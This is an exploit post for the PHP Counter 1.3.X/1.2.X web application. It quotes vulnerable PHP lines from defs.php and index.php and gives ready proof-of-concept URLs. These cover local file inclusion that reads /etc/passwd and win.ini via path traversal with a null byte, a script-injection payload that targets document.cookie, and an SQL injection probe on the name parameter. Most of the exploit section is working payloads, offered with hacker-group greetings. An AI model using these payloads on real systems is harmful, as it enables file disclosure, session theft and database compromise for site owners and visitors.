facebook facebook twitter rss

PHP Counter 1.3.X/1.2.X LFI/XSS/SQLi Vulnerabilities

Author: TUNISIAN CYBER , Published: 07-01-2014
[+] Author: TUNISIAN CYBER
[+] Exploit Title: PHP Counter 1.3.X/1.2.X LFI/XSS/SQLi Vulnerabilities
[+] Date: 07-01-14
[+] Category: WebApp
[+] Version(s): 1.3.X/1.2.X
[+] Google Dork: Use your mind
[+] Tested on: KaliLinux
[+] Vendor: http://acalproj.sourceforge.net/

########################################################################################

+Description:
A multi-account real time web-site counter in PHP/MySQL with lots of different statistics of the visitors.

+Exploit:

PHP Counter Suffers from an LFI,XSS and SQLi vulnerabilities:

1/LFI:

File(s): defs.php : Line(s) 70
Parameter:l

[PHP]
@include("langs/$_GET[l].php");
[PHP]

P.O.C:
Win Servers:
127.0.0.1/phpcounter.x.x.x/defs.php?l=../../../../../../../../../../windows/win.ini%00.php&name={name}

Linux Servers:
127.0.0.1/phpcounter.1.3.1/defs.php?l=../../../../../../../../../../etc/passwd%00.php&name={name}

2/ XSS:
P.O.C
127.0.0.1/phpcounter.1.3.1/index.php?l=en&name=Smith&action=3&page='"--></style></script><script>alert(document.cookie)</script>

3/SQLi

File(s): index.php : Line(s) 70-71
Parameter:name

[PHP]
$rs = mysql_query("select * from phpcounters where name='$_GET[name]'");
$row = mysql_fetch_array($rs);
[PHP]

P.O.C
127.0.0.1/phpcounter.1.3.1/index.php?name=1'

./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :